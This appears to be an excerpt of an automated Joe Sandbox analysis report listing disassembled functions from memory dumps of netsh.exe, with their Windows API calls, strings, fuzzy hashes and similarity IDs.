              • Opcode Fuzzy Hash: 6b6de4a4faa89b83bc0b2e6e291649565d8ce45c1c4dd6c24b2b9108105bf486
              • Instruction Fuzzy Hash: 7B312C75700302EFDB21AFA9DC96C7EB7ADFB84228310842DE9464F204D6719C49DBE0
              Function 01567BC0 Relevance: 18.2, APIs: 12, Instructions: 171windowCOMMON
              Download Yara Rule
              APIs
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C05
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C2C
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C53
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C3A
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,0156471D,00000000,00004000,00000000,00000000,?,01567E48,?,01567F23), ref: 01567939
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567940
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 0156794A
                • Part of subcall function 01567920: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567951
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567969
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567970
                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(000000B6,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567981
                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567998
                • Part of subcall function 01567920: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679A8
                • Part of subcall function 01567920: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679B4
                • Part of subcall function 01567920: PrintError.NETSH(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679BC
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679C5
                • Part of subcall function 01567920: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679CC
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(000003EE,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567C8C
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C98
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567CE5
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567D0C
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567D5F
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,01561714,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567D79
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001000,00000000,?,00000400,?,00004000,?,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48), ref: 01567DC3
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567DD1
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Handle$Heap$FormatFreeLoadMessageString$ByteCharConsoleErrorFileLocalMultiOutputProcessWideWrite$AllocCloseLastPrint
              • String ID:
              • API String ID: 1170536616-0
              • Opcode ID: bc8bf3f37e878e743a6f7a4d076fbfb0135440f3c3e5130d020d2207c851298d
              • Instruction ID: 1147d0e4e61488f76ec1e1964bc5d6e3d120b91e4c43f352463ced3436aa9339
              • Opcode Fuzzy Hash: bc8bf3f37e878e743a6f7a4d076fbfb0135440f3c3e5130d020d2207c851298d
              • Instruction Fuzzy Hash: 0151A33560011A9BEB319B54DC44EEE77BCFB48714F0085A4E95ADB284DB309E8CCFA0
              Function 015648A0 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 352COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 015689D7: lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,015648DC), ref: 015689EE
                • Part of subcall function 01568A48: lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,01561A54,?,?,?), ref: 01568A94
                • Part of subcall function 01568A48: memcmp.MSVCRT ref: 01568AA4
                • Part of subcall function 01568A48: lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,ras,?,?), ref: 01568AD8
                • Part of subcall function 01568A48: MatchToken.NETSH(?,diagnostics,?,?), ref: 01568B1C
                • Part of subcall function 01568A48: MatchToken.NETSH(?,set,?,diagnostics,?,?), ref: 01568B31
                • Part of subcall function 01568A48: MatchToken.NETSH(?,show,?,set,?,diagnostics,?,?), ref: 01568B42
                • Part of subcall function 01568A48: MatchToken.NETSH(?,tracing,?,set,?,diagnostics,?,?), ref: 01568B54
                • Part of subcall function 01568A48: MatchToken.NETSH(?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B66
                • Part of subcall function 01568A48: MatchToken.NETSH(?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B77
                • Part of subcall function 01568A48: MatchToken.NETSH(?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B88
                • Part of subcall function 01568A48: MatchToken.NETSH(?,dump,?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B99
              • PrintError.NETSH(00000000,00000000), ref: 0156492B
                • Part of subcall function 01568BE5: RegGetValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,System\CurrentControlSet\Services\RemoteAccess\Parameters,MultiTenancyEnabled,00000018,00000000,00000000,00000004), ref: 01568C30
                • Part of subcall function 01568BE5: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000), ref: 01568C52
              • MatchToken.NETSH(?,01561490,?), ref: 0156497C
              • MatchToken.NETSH(?,00000000,?), ref: 015649D3
              • MatchToken.NETSH(?,?,?), ref: 01564A32
              • MatchToken.NETSH(?,?,?), ref: 01564A72
                • Part of subcall function 015651C6: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 0156525B
                • Part of subcall function 015651C6: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 01565262
                • Part of subcall function 015651C6: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 01565286
                • Part of subcall function 015651C6: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 0156528D
              • GenericMonitor.NETSH(?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 01564BB9
                • Part of subcall function 015648A0: MatchToken.NETSH(?,help,?,?,?), ref: 01564BDC
                • Part of subcall function 015648A0: MatchToken.NETSH(?,015612B0,?,help,?,?,?), ref: 01564BF1
                • Part of subcall function 015648A0: MatchCmdLine.NETSH(?,-000000FB,?,?,?,015612B0,?,help,?,?,?), ref: 01564C3E
                • Part of subcall function 0156846A: PrintMessageFromModule.NETSH(00000087,00000000,?,?,?,01564CB5,?,00000002,?,?,?,?), ref: 0156850E
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Match$Token$Heap$lstrcmpi$PrintProcess$AllocCloseErrorFreeFromGenericLineMessageModuleMonitorValuememcmp
              • String ID: help
              • API String ID: 1271217041-143088812
              • Opcode ID: 31e8722618eb1ea799304b1d178e30703b9602a33fe8195e811bdb1b67f8fc67
              • Instruction ID: f393dc22db1234b664ad5f37d853cd251fbfe56e742f9a068d4609c3fcc0dd38
              • Opcode Fuzzy Hash: 31e8722618eb1ea799304b1d178e30703b9602a33fe8195e811bdb1b67f8fc67
              • Instruction Fuzzy Hash: 55D14870A0020AEFDF15DF69C9809AEBBBAFF88314B048159E9159F256D731ED61CBD0
              Function 00D92890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: 9a0717efed1b2de52c322555a2aa8719446ea5ef4b6ce8f924ce7c3448cf1925
              • Instruction ID: 3058465020d5c9f6d7050c20bfc9809e3eb6f683efe2b045b828bba985638d57
              • Opcode Fuzzy Hash: 9a0717efed1b2de52c322555a2aa8719446ea5ef4b6ce8f924ce7c3448cf1925
              • Instruction Fuzzy Hash: F251D7B6A0011ABFCF10DB9C8890A7EFBB8FB18304B14C269E4A5D7641D274DE548BF0
              Function 00E02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: b24d21488773fec695c46f4fcaebe9abed848bb1c5fb2ec14fadf60563edd906
              • Instruction ID: e89c8d79301e1b5ff45effad4413cb0249cd34fb73a5a0ed80e3f5c23a183180
              • Opcode Fuzzy Hash: b24d21488773fec695c46f4fcaebe9abed848bb1c5fb2ec14fadf60563edd906
              • Instruction Fuzzy Hash: EF51E571A00645AFCB30DE5CCC9497EBBF9EB44304B14945EE6A6E76C1E674DE808B60
              Function 01562FD0 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 83memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 01565EB0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000000C,?,00000000,?,?,?,?,015651DC,?,?,?,01564B22,?,?,?), ref: 01565D5D
                • Part of subcall function 01565EB0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565D64
                • Part of subcall function 01565EB0: PrintMessageFromModule.NETSH(00000068,?,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565E91
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0156300B
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563012
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563032
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563039
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563058
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156305F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156307B
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563082
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563091
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563098
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$AllocFromMessageModulePrint
              • String ID: netsh
              • API String ID: 695201130-4166728403
              • Opcode ID: 80d6d34339476df12b7e0a5e562097435b01e3b671a317ba98a11710beec5aa4
              • Instruction ID: 93fa9b1ba3eefd678991a8a6d83b8bce2f4749f1c23a9d698f8de0fc332ba677
              • Opcode Fuzzy Hash: 80d6d34339476df12b7e0a5e562097435b01e3b671a317ba98a11710beec5aa4
              • Instruction Fuzzy Hash: D1217F71620202EFDB229FA9E44DB59BBADFF44735F118419E51D8F246DB709848CBA0
              Function 01568130 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88COMMON
              Download Yara Rule
              APIs
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 01568153
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Handle
              • String ID: NetshStopRefreshEvent
              • API String ID: 2519475695-639338441
              • Opcode ID: 9f8b9daf2ccf6649f3b3b088b6f914939a072ef117aac5444523111c53a045c3
              • Instruction ID: bed65acae4150aac3c536ac3c0bfb1856ea31bf6a423867b0ba1034906d670b1
              • Opcode Fuzzy Hash: 9f8b9daf2ccf6649f3b3b088b6f914939a072ef117aac5444523111c53a045c3
              • Instruction Fuzzy Hash: 7B311A71910215EFDB129FA4DC45BAEBBB8FF09726F110515F922EF280D77498448BA4
              Function 00D87630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
              Download Yara Rule
              Strings
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00DC46FC
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00DC4787
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00DC4725
              • ExecuteOptions, xrefs: 00DC46A0
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00DC4742
              • Execute=1, xrefs: 00DC4713
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00DC4655
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              • Opcode ID: be35b27694306c83800a43eed78a6b3246d74321b546f3c3328b5a9dab57f7c6
              • Instruction ID: 90dae9b0aa987692ce78572b03781318574b96e00a9fa8f9a3a83b9796bcb6c5
              • Opcode Fuzzy Hash: be35b27694306c83800a43eed78a6b3246d74321b546f3c3328b5a9dab57f7c6
              • Instruction Fuzzy Hash: 305117356442197ADF10BBA5DC96FAE77A8EF45300F2800A9E505A72D1EB70DE45CF70
              Function 01564210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
              Download Yara Rule
              APIs
              • PrintMessageFromModule.NETSH(000000CB), ref: 01564257
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
                • Part of subcall function 0156412C: ConvertGuidToString.NETSH(?,?), ref: 0156417C
                • Part of subcall function 0156412C: PrintMessageFromModule.NETSH(000000C8,?,?), ref: 0156419F
                • Part of subcall function 0156412C: PrintMessageFromModule.NETSH(000000C9), ref: 015641B6
                • Part of subcall function 0156412C: PrintMessageFromModule.NETSH(000000CA,?), ref: 015641D3
              • PrintMessageFromModule.NETSH(000000CC), ref: 01564296
              • PrintMessage.NETSH(%1!s!,00000000), ref: 015642AB
              • ConvertGuidToString.NETSH(?,?), ref: 015642ED
              • ConvertGuidToString.NETSH(?,?), ref: 01564301
              • PrintMessageFromModule.NETSH(000000CD), ref: 01564315
              • PrintMessageFromModule.NETSH(000000CE,?,?,?), ref: 01564345
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint$FromModule$String$ConvertGuid$AddressLoadProc
              • String ID: %1!s!
              • API String ID: 953968408-1485915839
              • Opcode ID: 3b758d465ce51508492d98335d5e63c755bbaac096796d36201f3c35063ae256
              • Instruction ID: 07841f98cd2b9a809094c0b27b2f8772e0b224b2cf89d4cd21912028d6f10917
              • Opcode Fuzzy Hash: 3b758d465ce51508492d98335d5e63c755bbaac096796d36201f3c35063ae256
              • Instruction Fuzzy Hash: 7531E9717002069FEB34DB68EC85F6A77EDFB94218F520129D5198F184DB30AD49DB90
              Function 01563861 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90windowlibraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000), ref: 01563896
              • PrintMessageFromModule.NETSH(0000006A,?,?,00000000,00000000), ref: 015638B2
              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,InitHelperDll,?,00000000,00000000), ref: 015638CA
              • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,00000000), ref: 015638FB
              • PrintMessageFromModule.NETSH(?,000003ED,InitHelperDll,?,?,00000000,00000000), ref: 015638F2
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessageFromModule.NETSH(00000088,InitHelperDll,?,00000000,?,00000000,00000000), ref: 01563960
                • Part of subcall function 01563CED: _wcsicmp.MSVCRT ref: 01563D15
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: FromMessageModulePrint$AddressLibraryLoadProc$FreeString_wcsicmp
              • String ID: InitHelperDll$InitHelperDll
              • API String ID: 4046571770-3952794692
              • Opcode ID: 85be18c9941ade2e0ac2335e714ce940d61426badd23f1c41294d40080d13c3b
              • Instruction ID: 61c4da552f77021e89d8dcdffb800c0765bf9cc81b80756b25f1e4d4ccc571db
              • Opcode Fuzzy Hash: 85be18c9941ade2e0ac2335e714ce940d61426badd23f1c41294d40080d13c3b
              • Instruction Fuzzy Hash: 5131F871B10701AFD7729F58EC86E3677A9FB84314B420828E81A9F295DB70AC09DB91
              Function 01564F67 Relevance: 13.7, APIs: 9, Instructions: 240memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000000C,00000000,?,?,?,?,?,?,0156603A,00000000,?,?,?,?,?), ref: 01565057
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,0156603A,00000000,?,?,?,?,?,?,?), ref: 0156505E
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$AllocProcess
              • String ID:
              • API String ID: 1617791916-0
              • Opcode ID: b2028bb97b98e802968641b356625fa3035e90cea625a3a142f8492e768dc1b7
              • Instruction ID: 93424b3dfcd1e972896f04db904cdd8cc053631dfc12177d0f3d6e0883f45932
              • Opcode Fuzzy Hash: b2028bb97b98e802968641b356625fa3035e90cea625a3a142f8492e768dc1b7
              • Instruction Fuzzy Hash: 34712575A60212DBDB249F6CD8546BEB7E9FF446A4B444429EA85DF380FA31C842C7E0
              Function 015676D4 Relevance: 13.6, APIs: 9, Instructions: 91COMMON
              Download Yara Rule
              APIs
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,00000000,00000000,?), ref: 015676EF
              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 015676F6
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?), ref: 01567711
              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 01567718
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,00000001,?,00000000), ref: 0156772C
              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 01567733
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?), ref: 0156778E
              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 01567795
              • fputwc.MSVCRT ref: 015677AA
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ConsoleHandle$Mode$Readfputwc
              • String ID:
              • API String ID: 2610215220-0
              • Opcode ID: cdcb9e9e08b727d5ee85f4fb0b149455e7d709a587ef9f63dda13b7880066d2c
              • Instruction ID: 788ccb07acd156962dbaeff5354bcaeae15933dc2a8d6d8d9dca514bef65547b
              • Opcode Fuzzy Hash: cdcb9e9e08b727d5ee85f4fb0b149455e7d709a587ef9f63dda13b7880066d2c
              • Instruction Fuzzy Hash: D121D736910106ABDB209BA8E805AAD77BCFF08338F200625E925DF1C4D67499848BA1
              Function 01567FB0 Relevance: 12.1, APIs: 8, Instructions: 65memorywindowCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00008000), ref: 01567FCD
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01567FD4
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,00000000,00004000), ref: 01567FEC
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,00000000,00000000,00000000,?,00000000,?), ref: 01568007
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,0156471D,00000000,00004000,00000000,00000000,?,01567E48,?,01567F23), ref: 01567939
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567940
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 0156794A
                • Part of subcall function 01567920: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567951
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567969
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567970
